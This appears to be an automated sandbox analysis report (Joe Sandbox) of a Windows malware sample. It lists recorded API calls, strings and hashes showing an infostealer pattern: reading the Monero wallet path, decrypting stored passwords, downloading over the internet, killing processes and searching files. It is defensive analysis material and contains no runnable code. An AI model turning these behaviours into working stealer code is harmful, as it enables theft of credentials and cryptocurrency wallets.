                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                              • String ID: Password
                              • API String ID: 356768136-3434357891
                              • Opcode ID: d8d32f86fb75ae8f0ceb8d18ce7c43588c2c8a987f2f0c3e2855cc6fd1dbdd53
                              • Instruction ID: 7bf55cee5ca582eff8844279d3bc0193def149c46ff705f15988051bc0c40829
                              • Opcode Fuzzy Hash: d8d32f86fb75ae8f0ceb8d18ce7c43588c2c8a987f2f0c3e2855cc6fd1dbdd53
                              • Instruction Fuzzy Hash: 8C7131B1D1011D9BDF10DF95CC84AEEBBB9FF49300F14456AE509E7200EB756A85CBA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00591015
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0059101C
                              • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00591039
                              • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00591053
                              • RegCloseKey.ADVAPI32(?), ref: 0059105D
                              Strings
                              • SOFTWARE\monero-project\monero-core, xrefs: 0059102F
                              • wallet_path, xrefs: 0059104D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                              • API String ID: 3225020163-4244082812
                              • Opcode ID: c0d6a2f4998bbaa7f77e983463290f174645d5a29ee7b9437721290038d9f90c
                              • Instruction ID: 555177933baf5eefe0c4b5dc1d3619ca21fba14411d15788ed6f950ba24c4ddd
                              • Opcode Fuzzy Hash: c0d6a2f4998bbaa7f77e983463290f174645d5a29ee7b9437721290038d9f90c
                              • Instruction Fuzzy Hash: 04F0907564030ABFD7109BE0AC4DFAF7B3CEB04711F104058FF05E2281E6B49A4487A8
                              APIs
                              • memcmp.MSVCRT(?,v20,00000003), ref: 00599E64
                              • memcmp.MSVCRT(?,v10,00000003), ref: 00599EA2
                              • LocalAlloc.KERNEL32(00000040), ref: 00599F07
                                • Part of subcall function 005B7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 005B722E
                              • lstrcpy.KERNEL32(00000000,005C5210), ref: 0059A012
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemcmp$AllocLocal
                              • String ID: @$v10$v20
                              • API String ID: 102826412-278772428
                              • Opcode ID: fe56aee93fc0eb1d818e61137467e37314c38e8ee34309837ea31b1877e8e8a6
                              • Instruction ID: 104bf8d84609636edd15b63f3b3ae84ca1c32c82d8a711d6262eea94447fc0ab
                              • Opcode Fuzzy Hash: fe56aee93fc0eb1d818e61137467e37314c38e8ee34309837ea31b1877e8e8a6
                              • Instruction Fuzzy Hash: 2C51A135A1120AABDF10EFA8CC49B9EBFA4FF84314F154428F949AB251DB70ED458BD0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00595589
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00595590
                              • InternetOpenA.WININET(005BD014,00000000,00000000,00000000,00000000), ref: 005955A6
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 005955C1
                              • InternetReadFile.WININET(?,?,00000400,00000001), ref: 005955EC
                              • memcpy.MSVCRT(00000000,?,00000001), ref: 00595611
                              • InternetCloseHandle.WININET(?), ref: 0059562B
                              • InternetCloseHandle.WININET(00000000), ref: 00595632
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                              • String ID:
                              • API String ID: 1008454911-0
                              • Opcode ID: 9e46ba51795ee42dd6ac05a488984de2cf86d8febfb89bd9c1e18ea2339a66e6
                              • Instruction ID: 7f760440a1fdb2a34afc44435ab7ceaa9b2d7c03b6336a331e5df1652981403b
                              • Opcode Fuzzy Hash: 9e46ba51795ee42dd6ac05a488984de2cf86d8febfb89bd9c1e18ea2339a66e6
                              • Instruction Fuzzy Hash: 07416E70A00605AFDB15CF55CC48FA9BBB4FF48304F68C1ADE6089B290E7759951CF98
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005B4779
                              • Process32First.KERNEL32(00000000,00000128), ref: 005B4789
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B479B
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005B47BC
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 005B47CB
                              • CloseHandle.KERNEL32(00000000), ref: 005B47D2
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B47E0
                              • CloseHandle.KERNEL32(00000000), ref: 005B47EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: 954d9591b90e3fa67d1f076f80c4e3e1924a0944afa3c8377ecb141d627793db
                              • Instruction ID: 5917362075850ac5280cdee279be7efc2fa60adbe633bd95eacf351dff0e06ce
                              • Opcode Fuzzy Hash: 954d9591b90e3fa67d1f076f80c4e3e1924a0944afa3c8377ecb141d627793db
                              • Instruction Fuzzy Hash: 33019271641219ABE7705B209C8DFEA7B7CFB08751F044198FA0591082EF78DD91CF65
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E8C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E8F5
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E944
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E96A
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059E9A2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0059E9D8
                              • FindClose.KERNEL32(00000000), ref: 0059E9E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$CloseFileNext
                              • String ID:
                              • API String ID: 1875835556-0
                              • Opcode ID: 6a23ae4e1f8a05cebaaa1a642f9bc65d65907758c72249c18442a33fa10e44ae
                              • Instruction ID: b066cb838690a8c7b7cd1da1db65f772d920227011f093b0096e1287d8f81a24
                              • Opcode Fuzzy Hash: 6a23ae4e1f8a05cebaaa1a642f9bc65d65907758c72249c18442a33fa10e44ae
                              • Instruction Fuzzy Hash: 1802EA70A012158FDF68CF19C58AB65BBE5BF44714F1DC1ADD8499B2A2D736DC82CB80
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 005A84C5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A84FC
                              • lstrlen.KERNEL32(00000000), ref: 005A8542
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A8575
                              • lstrlen.KERNEL32(00000000), ref: 005A858B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A85BA
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005A85CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 14539a4ccc2e825d509f327939a5684d64ffd20ec69be8cb6b739c25b4c06533
                              • Instruction ID: 809c35c32c8d1c49a26ada93274b4ee3a8982dbdc4d635c2caacaebe16e47bee
                              • Opcode Fuzzy Hash: 14539a4ccc2e825d509f327939a5684d64ffd20ec69be8cb6b739c25b4c06533
                              • Instruction Fuzzy Hash: AD516D75900206ABCB24DF68D884A6BBBF8FF89710F18845DEC45DB255EB34ED41CB54
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005988B3
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1B8
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1DE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx$xY$xY
                              • API String ID: 2002836212-1807622900
                              • Opcode ID: c77a94cb8ccfdf85a5c07a7e2dbdcd0f83cbecb97f7b601e7ff19a9b7e59fffd
                              • Instruction ID: 6a81db55b295f40dd0ca7159397d9b8f72e31ea45bf7b0db95f6de39e2aa862d
                              • Opcode Fuzzy Hash: c77a94cb8ccfdf85a5c07a7e2dbdcd0f83cbecb97f7b601e7ff19a9b7e59fffd
                              • Instruction Fuzzy Hash: C63146B5E005159BCF08DF58C8916ADBBB6FB89350F188269E915EB385DB30AD01CBD1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 005B28C5
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B28CC
                              • RegOpenKeyExA.ADVAPI32(80000002,015FC858,00000000,00020119,005B2849), ref: 005B28EB
                              • RegQueryValueExA.ADVAPI32(005B2849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 005B2905
                              • RegCloseKey.ADVAPI32(005B2849), ref: 005B290F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 3c691f6d5b6419b6d65e6f5f7486cfe9cc0fee959efc8c21ba428cfd6e0ef707
                              • Instruction ID: 9b17bba56cb3bd7290d3260fb8f53c495628bc78b07782bc67611ff2dbe89c5b
                              • Opcode Fuzzy Hash: 3c691f6d5b6419b6d65e6f5f7486cfe9cc0fee959efc8c21ba428cfd6e0ef707
                              • Instruction Fuzzy Hash: C601BC75600219ABE310CBA09C59FEB7BBCEB48701F10809DFE49D7240EA34698487A4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 005B2835
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B283C
                                • Part of subcall function 005B28B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 005B28C5
                                • Part of subcall function 005B28B0: RtlAllocateHeap.NTDLL(00000000), ref: 005B28CC
                                • Part of subcall function 005B28B0: RegOpenKeyExA.ADVAPI32(80000002,015FC858,00000000,00020119,005B2849), ref: 005B28EB
                                • Part of subcall function 005B28B0: RegQueryValueExA.ADVAPI32(005B2849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 005B2905
                                • Part of subcall function 005B28B0: RegCloseKey.ADVAPI32(005B2849), ref: 005B290F
                              • RegOpenKeyExA.ADVAPI32(80000002,015FC858,00000000,00020119,005A9560), ref: 005B2871
                              • RegQueryValueExA.ADVAPI32(005A9560,0160E448,00000000,00000000,00000000,000000FF), ref: 005B288C
                              • RegCloseKey.ADVAPI32(005A9560), ref: 005B2896
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 62ca9486074599755ef1a34ed80d7972772b18e5de461bedcc9f4e692f501e40
                              • Instruction ID: 2fc1885e4b14bb6229ce5a6f0a7a32fbb6f227af8c69d35f368a9d2eba58630e
                              • Opcode Fuzzy Hash: 62ca9486074599755ef1a34ed80d7972772b18e5de461bedcc9f4e692f501e40
                              • Instruction Fuzzy Hash: BB01A271600209BBD7509BA4EC4DFEA7B7CEB44311F00819DFE08D6250EA74A98187A9
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B23CC
                              • lstrlen.KERNEL32(00000000), ref: 005B2469
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B24F0
                              • lstrlen.KERNEL32(00000000), ref: 005B24F7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
